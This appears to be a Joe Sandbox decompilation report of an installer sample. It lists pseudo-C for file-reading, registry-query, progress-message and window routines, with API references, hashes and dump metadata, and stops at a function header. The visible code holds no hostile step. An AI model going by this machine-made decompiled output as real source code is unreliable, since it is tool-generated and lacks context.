                                                            			E00402F1F(void* __ecx, long _a4, void* _a8, void* _a12, long _a16) {
                                                            				long _v8;
                                                            				intOrPtr _v12;
                                                            				long _t28;
                                                            				intOrPtr _t29;
                                                            				void* _t31;
                                                            				long _t32;
                                                            				int _t33;
                                                            				long _t34;
                                                            				void* _t35;
                                                            				int _t37;
                                                            				long _t38;
                                                            				long _t39;
                                                            				long _t46;
                                                            
                                                            				_t28 = _a4;
                                                            				if(_t28 >= 0) {
                                                            					_t39 = _t28 +  *0x423738;
                                                            					 *0x41688c = _t39;
                                                            					SetFilePointer( *0x40901c, _t39, 0, 0); // executed
                                                            				}
                                                            				_t29 = E0040303A(4);
                                                            				if(_t29 >= 0) {
                                                            					_t31 = E004059E7( *0x40901c,  &_a4, 4); // executed
                                                            					if(_t31 == 0) {
                                                            						L19:
                                                            						_push(0xfffffffd);
                                                            						goto L20;
                                                            					} else {
                                                            						 *0x41688c =  *0x41688c + 4;
                                                            						_t29 = E0040303A(_a4);
                                                            						_v12 = _t29;
                                                            						if(_t29 >= 0) {
                                                            							if(_a12 != 0) {
                                                            								_t32 = _a4;
                                                            								if(_t32 >= _a16) {
                                                            									_t32 = _a16;
                                                            								}
                                                            								_t33 = ReadFile( *0x40901c, _a12, _t32,  &_v8, 0); // executed
                                                            								if(_t33 != 0) {
                                                            									_t34 = _v8;
                                                            									 *0x41688c =  *0x41688c + _t34;
                                                            									_v12 = _t34;
                                                            									goto L22;
                                                            								} else {
                                                            									goto L19;
                                                            								}
                                                            							} else {
                                                            								if(_a4 <= 0) {
                                                            									L22:
                                                            									_t29 = _v12;
                                                            								} else {
                                                            									while(1) {
                                                            										_t46 = _a4;
                                                            										if(_a4 >= 0x4000) {
                                                            											_t46 = 0x4000;
                                                            										}
                                                            										_v8 = _t46;
                                                            										_t35 = E004059E7( *0x40901c, 0x412888, _t46); // executed
                                                            										if(_t35 == 0) {
                                                            											goto L19;
                                                            										}
                                                            										_t37 = WriteFile(_a8, 0x412888, _v8,  &_a16, 0); // executed
                                                            										if(_t37 == 0 || _a16 != _t46) {
                                                            											_push(0xfffffffe);
                                                            											L20:
                                                            											_pop(_t29);
                                                            										} else {
                                                            											_t38 = _v8;
                                                            											_v12 = _v12 + _t38;
                                                            											_a4 = _a4 - _t38;
                                                            											 *0x41688c =  *0x41688c + _t38;
                                                            											if(_a4 > 0) {
                                                            												continue;
                                                            											} else {
                                                            												goto L22;
                                                            											}
                                                            										}
                                                            										goto L23;
                                                            									}
                                                            									goto L19;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				L23:
                                                            				return _t29;
                                                            			}
















                                                            0x00402f24
                                                            0x00402f2d
                                                            0x00402f36
                                                            0x00402f3a
                                                            0x00402f45
                                                            0x00402f45
                                                            0x00402f4d
                                                            0x00402f54
                                                            0x00402f66
                                                            0x00402f6d
                                                            0x00403020
                                                            0x00403020
                                                            0x00000000
                                                            0x00402f73
                                                            0x00402f76
                                                            0x00402f7d
                                                            0x00402f84
                                                            0x00402f87
                                                            0x00402f90
                                                            0x00402ffc
                                                            0x00403002
                                                            0x00403004
                                                            0x00403004
                                                            0x00403016
                                                            0x0040301e
                                                            0x00403025
                                                            0x00403028
                                                            0x0040302e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00402f92
                                                            0x00402f95
                                                            0x00403031
                                                            0x00403031
                                                            0x00402f9b
                                                            0x00402fa0
                                                            0x00402fa7
                                                            0x00402faa
                                                            0x00402fac
                                                            0x00402fac
                                                            0x00402fb9
                                                            0x00402fbc
                                                            0x00402fc3
                                                            0x00000000
                                                            0x00000000
                                                            0x00402fd2
                                                            0x00402fda
                                                            0x00402ff8
                                                            0x00403022
                                                            0x00403022
                                                            0x00402fe1
                                                            0x00402fe1
                                                            0x00402fe4
                                                            0x00402fe7
                                                            0x00402fea
                                                            0x00402ff4
                                                            0x00000000
                                                            0x00402ff6
                                                            0x00000000
                                                            0x00402ff6
                                                            0x00402ff4
                                                            0x00000000
                                                            0x00402fda
                                                            0x00000000
                                                            0x00402fa0
                                                            0x00402f95
                                                            0x00402f90
                                                            0x00402f87
                                                            0x00402f6d
                                                            0x00403034
                                                            0x00403037

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                                                            • WriteFile.KERNELBASE(00000000,00412888,?,000000FF,00000000,00412888,00004000,00409130,00409130,00000004,00000004,00000000,00000000,?,?), ref: 00402FD2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: File$PointerWrite
                                                            • String ID:
                                                            • API String ID: 539440098-0
                                                            • Opcode ID: 1c898c40f4255edd407dd83f9c9e53847d876c5e3b3b92bcfc21a2c66a14f794
                                                            • Instruction ID: e6de339a950e3072e6bd285c0139ce9fe6f591fe0572f4373a504b9c05a9d2ef
                                                            • Opcode Fuzzy Hash: 1c898c40f4255edd407dd83f9c9e53847d876c5e3b3b92bcfc21a2c66a14f794
                                                            • Instruction Fuzzy Hash: 42316970502259EBDF20DF55ED44A9E3BBCEB003A5F20803AF904E61D0D374DA40EBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E00405BC5(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
                                                            				long _t20;
                                                            				char* _t26;
                                                            
                                                            				asm("sbb eax, eax");
                                                            				_t26 = _a16;
                                                            				 *_t26 = 0;
                                                            				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                            				if(_t20 == 0) {
                                                            					_a8 = 0x400;
                                                            					if(RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8) != 0 || _a16 != 1 && _a16 != 2) {
                                                            						 *_t26 = 0;
                                                            					}
                                                            					_t26[0x3ff] = 0;
                                                            					return RegCloseKey(_a20);
                                                            				}
                                                            				return _t20;
                                                            			}





                                                            0x00405bd5
                                                            0x00405bd7
                                                            0x00405be4
                                                            0x00405bee
                                                            0x00405bf6
                                                            0x00405bfb
                                                            0x00405c17
                                                            0x00405c25
                                                            0x00405c25
                                                            0x00405c2a
                                                            0x00000000
                                                            0x00405c30
                                                            0x00405c39

                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,00405E0A,00000000,00000002,?,00000002,?,?,00405E0A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405BEE
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00405E0A,?,00405E0A), ref: 00405C0F
                                                            • RegCloseKey.ADVAPI32(?), ref: 00405C30
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3677997916-0
                                                            • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                            • Instruction ID: 047f747c479f1ba90910982628ff2a27228e60a50e2c11dba67ada3cfd0a07d9
                                                            • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                            • Instruction Fuzzy Hash: D0015A7154424EEFEB228F64EC44AEB3FACEF14358F004436F905A6220D235D964CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004059E7(void* _a4, void* _a8, long _a12) {
                                                            				int _t7;
                                                            				long _t11;
                                                            
                                                            				_t11 = _a12;
                                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                            					return 0;
                                                            				} else {
                                                            					return 1;
                                                            				}
                                                            			}





                                                            0x004059eb
                                                            0x004059fb
                                                            0x00405a03
                                                            0x00000000
                                                            0x00405a0a
                                                            0x00000000
                                                            0x00405a0c

                                                            APIs
                                                            • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00412888,090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000,004031C9,00409130,00409130,004030BB,00412888,00004000,?,00000000,?), ref: 004059FB
                                                            Strings
                                                            • 090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000, xrefs: 004059E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID: 090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000
                                                            • API String ID: 2738559852-2221801228
                                                            • Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                            • Instruction ID: 267b57ffcffc4b39201858a503e5f4d445fc1ddc2041b1288b81c8d36a0eb731
                                                            • Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                            • Instruction Fuzzy Hash: E6E0E632754199AFDF209E559C44EEB775CEB05350F004532FA15F3150D631E9219FA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 21%
                                                            			E10002800(void* __ecx, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            				long _t36;
                                                            				void* _t40;
                                                            				void* _t49;
                                                            				void* _t54;
                                                            				void* _t58;
                                                            				signed int _t65;
                                                            				void* _t70;
                                                            				void* _t79;
                                                            				intOrPtr _t81;
                                                            				signed int _t88;
                                                            				intOrPtr _t90;
                                                            				intOrPtr _t91;
                                                            				void* _t92;
                                                            				void* _t94;
                                                            				void* _t100;
                                                            				void* _t101;
                                                            				void* _t102;
                                                            				void* _t103;
                                                            				intOrPtr _t106;
                                                            				intOrPtr _t107;
                                                            
                                                            				if( *0x10004040 != 0 && E10002780(_a4) == 0) {
                                                            					 *0x10004044 = _t106;
                                                            					if( *0x1000403c != 0) {
                                                            						_t106 =  *0x1000403c;
                                                            					} else {
                                                            						E10002D40(E1000277A(), __ecx);
                                                            						 *0x1000403c = _t106;
                                                            					}
                                                            				}
                                                            				_t31 = E100027BC(_a4);
                                                            				_t107 = _t106 + 4;
                                                            				if(_t31 <= 0) {
                                                            					L9:
                                                            					_t32 = E100027B0();
                                                            					_t81 = _a4;
                                                            					_t90 =  *0x10004048;
                                                            					 *((intOrPtr*)(_t32 + _t81)) = _t90;
                                                            					 *0x10004048 = _t81;
                                                            					E100027AA();
                                                            					_t36 = SetFilePointer(??, ??, ??, ??); // executed
                                                            					 *0x1000401c = _t36;
                                                            					 *0x10004020 = _t90;
                                                            					if( *0x10004040 != 0 && E10002780( *0x10004048) == 0) {
                                                            						 *0x1000403c = _t107;
                                                            						_t107 =  *0x10004044;
                                                            					}
                                                            					_t91 =  *0x10004048;
                                                            					_a4 = _t91;
                                                            					 *0x10004048 =  *((intOrPtr*)(E100027B0() + _t91));
                                                            					_t40 = E1000278E(_t91);
                                                            					_pop(_t92);
                                                            					if(_t40 != 0) {
                                                            						_t49 = E100027BC(_t92);
                                                            						if(_t49 > 0) {
                                                            							_push(_t49);
                                                            							_push(E100027C7() + _a4 + _v8);
                                                            							_push(E100027D1());
                                                            							if( *0x10004040 <= 0 || E10002780(_a4) != 0) {
                                                            								_pop(_t101);
                                                            								_pop(_t54);
                                                            								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
                                                            								}
                                                            								asm("loop 0xfffffff5");
                                                            							} else {
                                                            								_pop(_t102);
                                                            								_pop(_t58);
                                                            								 *0x1000403c =  *0x1000403c +  *(_t102 + _t58) * 4;
                                                            								asm("loop 0xffffffeb");
                                                            							}
                                                            						}
                                                            					}
                                                            					if( *0x10004048 == 0) {
                                                            						 *0x1000403c = 0;
                                                            					}
                                                            					_t94 = _a4 + E100027C7();
                                                            					 *(E100027D5() + _t94) =  *0x1000401c;
                                                            					 *((intOrPtr*)(E100027D9() + _t94)) =  *0x10004020;
                                                            					E100027E9(_a4);
                                                            					if(E1000279C() != 0) {
                                                            						 *0x10004058 = GetLastError();
                                                            					}
                                                            					return _a4;
                                                            				}
                                                            				_push(E100027C7() + _a4);
                                                            				_t65 = E100027CD();
                                                            				_v8 = _t65;
                                                            				_t88 = _t31;
                                                            				_push(_t77 + _t65 * _t88);
                                                            				_t79 = E100027D9();
                                                            				_t100 = E100027D5();
                                                            				_t103 = E100027D1();
                                                            				_t70 = _t88;
                                                            				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
                                                            					_push( *((intOrPtr*)(_t79 + _t70)));
                                                            				}
                                                            				_push( *((intOrPtr*)(_t100 + _t70)));
                                                            				asm("loop 0xfffffff1");
                                                            				goto L9;
                                                            			}


























                                                            0x10002810
                                                            0x10002821
                                                            0x1000282e
                                                            0x10002842
                                                            0x10002830
                                                            0x10002835
                                                            0x1000283a
                                                            0x1000283a
                                                            0x1000282e
                                                            0x1000284b
                                                            0x10002850
                                                            0x10002856
                                                            0x1000289a
                                                            0x1000289a
                                                            0x1000289f
                                                            0x100028a4
                                                            0x100028aa
                                                            0x100028ac
                                                            0x100028b2
                                                            0x100028bf
                                                            0x100028c1
                                                            0x100028c6
                                                            0x100028d3
                                                            0x100028e6
                                                            0x100028ec
                                                            0x100028f2
                                                            0x100028f3
                                                            0x100028f9
                                                            0x10002905
                                                            0x1000290b
                                                            0x10002913
                                                            0x10002914
                                                            0x10002917
                                                            0x10002922
                                                            0x10002924
                                                            0x10002930
                                                            0x10002936
                                                            0x1000293e
                                                            0x1000296a
                                                            0x1000296b
                                                            0x10002971
                                                            0x10002971
                                                            0x10002978
                                                            0x1000294e
                                                            0x1000294e
                                                            0x1000294f
                                                            0x1000295d
                                                            0x10002966
                                                            0x10002966
                                                            0x1000293e
                                                            0x10002922
                                                            0x10002981
                                                            0x10002983
                                                            0x10002983
                                                            0x10002995
                                                            0x100029a2
                                                            0x100029b0
                                                            0x100029b6
                                                            0x100029c4
                                                            0x100029cc
                                                            0x100029cc
                                                            0x100029da
                                                            0x100029da
                                                            0x10002861
                                                            0x10002862
                                                            0x10002867
                                                            0x1000286b
                                                            0x10002870
                                                            0x10002884
                                                            0x10002885
                                                            0x10002886
                                                            0x10002888
                                                            0x1000288d
                                                            0x1000288f
                                                            0x1000288f
                                                            0x10002892
                                                            0x10002898
                                                            0x00000000

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000), ref: 100028BF
                                                            • GetLastError.KERNEL32 ref: 100029C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5831148892.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.5831123478.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.5831177085.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.5831203248.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_zp.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 670f03678a5eaf619360d21028c39b4414a5d41f5967bb61c5d6db3b3f09e835
                                                            • Instruction ID: e4aa2bd3e495effe50d9526cbc68d205f519acfcad6f3d50ccedb804016fbdef
                                                            • Opcode Fuzzy Hash: 670f03678a5eaf619360d21028c39b4414a5d41f5967bb61c5d6db3b3f09e835
                                                            • Instruction Fuzzy Hash: 8D5162BA908215DFFB10DFA4DCC675937B4EB443D5F21842AEA08E722DDF34A9808B54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 84%
                                                            			E004023C8(int* __ebx, char* __esi) {
                                                            				void* _t17;
                                                            				char* _t18;
                                                            				void* _t33;
                                                            				void* _t37;
                                                            				void* _t40;
                                                            
                                                            				_t35 = __esi;
                                                            				_t27 = __ebx;
                                                            				_t17 = E00402B07(_t40, 0x20019); // executed
                                                            				_t33 = _t17;
                                                            				_t18 = E004029FD(0x33);
                                                            				 *__esi = __ebx;
                                                            				if(_t33 == __ebx) {
                                                            					 *(_t37 - 4) = 1;
                                                            				} else {
                                                            					 *(_t37 - 0x30) = 0x400;
                                                            					if(RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x30) != 0) {
                                                            						L7:
                                                            						 *_t35 = _t27;
                                                            						 *(_t37 - 4) = 1;
                                                            					} else {
                                                            						if( *(_t37 + 8) == 4) {
                                                            							__eflags =  *(_t37 - 0x14) - __ebx;
                                                            							 *(_t37 - 4) = 0 |  *(_t37 - 0x14) == __ebx;
                                                            							E00405C3C(__esi,  *__esi);
                                                            						} else {
                                                            							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                            								 *(_t37 - 4) =  *(_t37 - 0x14);
                                                            								_t35[0x3ff] = _t27;
                                                            							} else {
                                                            								goto L7;
                                                            							}
                                                            						}
                                                            					}
                                                            					_push(_t33);
                                                            					RegCloseKey();
                                                            				}
                                                            				 *0x423768 =  *0x423768 +  *(_t37 - 4);
                                                            				return 0;
                                                            			}








                                                            0x004023c8
                                                            0x004023c8
                                                            0x004023cd
                                                            0x004023d4
                                                            0x004023d6
                                                            0x004023dd
                                                            0x004023df
                                                            0x00402663
                                                            0x004023e5
                                                            0x004023e8
                                                            0x00402403
                                                            0x00402433
                                                            0x00402433
                                                            0x00402435
                                                            0x00402405
                                                            0x00402409
                                                            0x00402422
                                                            0x00402429
                                                            0x0040242c
                                                            0x0040240b
                                                            0x0040240e
                                                            0x00402419
                                                            0x00402489
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040240e
                                                            0x00402409
                                                            0x0040248f
                                                            0x00402490
                                                            0x00402490
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                              • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
                                                            • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F8
                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsq8C22.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3677997916-0
                                                            • Opcode ID: 00b611ce2adfe02ff6c5a9eaf5ca41f632987ff226c5431869bfc43e06a7e239
                                                            • Instruction ID: 3e5648d23b1537cbe7151ba7cdfd06ebb71b75e9977eff4765d7e8492c0e8cfe
                                                            • Opcode Fuzzy Hash: 00b611ce2adfe02ff6c5a9eaf5ca41f632987ff226c5431869bfc43e06a7e239
                                                            • Instruction Fuzzy Hash: A311C171905205EFDB11DF64CA889BEBBB4EF00344F20843FE441B62C0D2B84A41DB6A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 59%
                                                            			E00401389(signed int _a4) {
                                                            				intOrPtr* _t6;
                                                            				void* _t8;
                                                            				void* _t10;
                                                            				signed int _t11;
                                                            				void* _t12;
                                                            				signed int _t16;
                                                            				signed int _t17;
                                                            				void* _t18;
                                                            
                                                            				_t17 = _a4;
                                                            				while(_t17 >= 0) {
                                                            					_t6 = _t17 * 0x1c +  *0x423710;
                                                            					if( *_t6 == 1) {
                                                            						break;
                                                            					}
                                                            					_push(_t6); // executed
                                                            					_t8 = E00401434(); // executed
                                                            					if(_t8 == 0x7fffffff) {
                                                            						return 0x7fffffff;
                                                            					}
                                                            					_t10 = E0040136D(_t8);
                                                            					if(_t10 != 0) {
                                                            						_t11 = _t10 - 1;
                                                            						_t16 = _t17;
                                                            						_t17 = _t11;
                                                            						_t12 = _t11 - _t16;
                                                            					} else {
                                                            						_t12 = _t10 + 1;
                                                            						_t17 = _t17 + 1;
                                                            					}
                                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                            						 *0x422ecc =  *0x422ecc + _t12;
                                                            						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x422ecc, 0x7530,  *0x422eb4), 0); // executed
                                                            					}
                                                            				}
                                                            				return 0;
                                                            			}











                                                            0x0040138a
                                                            0x004013fa
                                                            0x0040139b
                                                            0x004013a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004013a2
                                                            0x004013a3
                                                            0x004013ad
                                                            0x00000000
                                                            0x00401404
                                                            0x004013b0
                                                            0x004013b7
                                                            0x004013bd
                                                            0x004013be
                                                            0x004013c0
                                                            0x004013c2
                                                            0x004013b9
                                                            0x004013b9
                                                            0x004013ba
                                                            0x004013ba
                                                            0x004013c9
                                                            0x004013cb
                                                            0x004013f4
                                                            0x004013f4
                                                            0x004013c9
                                                            0x00000000

                                                            APIs
                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
                                                            • Instruction ID: debc39b6c0c0c652093bc86d0143b21aa6e0fee53ad258223395c8adf4e96fc0
                                                            • Opcode Fuzzy Hash: b1266aa11e643af42e09abacd7039328ff80c1a9d1715c4620ec2c771a0149d8
                                                            • Instruction Fuzzy Hash: 69012831724210ABE7294B789D04B6A3698FB10315F11853BF851F72F1D6B8DC029B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Window$EnableShow
                                                            • String ID:
                                                            • API String ID: 1136574915-0
                                                            • Opcode ID: a674f952c4992ca0b0c2ad7e4aa9e05cf6c98ab2d445a723cb4c6e86d75d0f96
                                                            • Instruction ID: 2292e0465f89c440c037b44611e353697929a97950b3395032e547bd7800e083
                                                            • Opcode Fuzzy Hash: a674f952c4992ca0b0c2ad7e4aa9e05cf6c98ab2d445a723cb4c6e86d75d0f96
                                                            • Instruction Fuzzy Hash: 22E0CD72B04110EBDB10BBB45E4A55E3374DF10359B104437F501F11C1D2B85C40865D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0040596F(CHAR* _a4, long _a8, long _a12) {
